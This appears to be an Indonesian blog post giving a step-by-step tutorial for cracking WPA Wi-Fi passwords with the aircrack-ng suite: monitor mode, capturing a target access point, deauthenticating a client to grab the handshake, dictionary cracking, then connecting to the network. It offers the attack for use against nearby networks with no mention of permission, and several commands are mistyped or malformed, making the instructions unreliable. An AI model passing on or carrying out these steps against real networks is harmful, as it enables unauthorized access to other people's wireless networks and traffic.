MENGUNAKAN AIRCRACK-NG

MENGUNAKAN AIRCRACK-NG


Oke sekarang saya akan berbagi cara mengunakan aircrack-ng , bagi kalian yang sudah tau bantu-bantu sama yang belum tau yaaa, jangan pelit heheh ..,

 

  Kali ini saya akan berbagi langah-langkahnya sedikit tentang aircrack-ng, oke gak usah lama-lama lagi kita langsung peraktek aja.

liat di bawah ini :


Deskripsi.
1. Dictionary attack
    Briefing
2. Hentikan semua proses yang menghambat jalannya aireplay
3. Simpan hasil monitoring
4. Lakukan aireplay untuk mendapatkan WPA Handshake
5. Crack hasil rekaman dengan dictionary attack
6. Gameover


Langkah.
1. hentikan semua peroses yang menghambat jalannya aireplay
    ketik seperti di bawa ini :
#  airmon-ng check kill


2. buat interface baru dengan mode monitor menggunakan airmon-ng
    ketik seperti di bawa ini :
#  airmon-ng start wlan0


3. monitoring setiap akses poin yang ada di sekitar kita
    ketik seperti di bawa ini :
#  airodum-ng mon0


4. pilih target, kemudian monitoring dan simpan hasil monitoring airodump
    ketik seperti di bawa ini :
airodump-ng -write output -channel6 -bssid C2:9F:DB:67:5A:E6 mon0



Setelah itu jalankan aireplay-ng untuk mendapatkan wpa 

ketik seperti di bawah ini :
aireplay-ng -deauth 1 -a (mac address akses poin) -c (mac address kilen)


Jika sudah selesai mendapatkan dan wpa dari kilen , selanjutnya kita hentikan peroses airodum-nglalu cracking password dengan airrack-ng 


ketikan seperti di bawah ini :
# aircrack-ng output-01.cap -w/root/crack wpa.txt


Dan jika Sesudah mendapatkannya coba kita konekan ke komputer/pc kita


Sekian postinagan dari saya, sekiranya mohon maaf jika ada kekurangan pembelajaran ini saya dapat dari teman-teman saya.

"terima kasih kepada teman saya yang sudah membantu saya"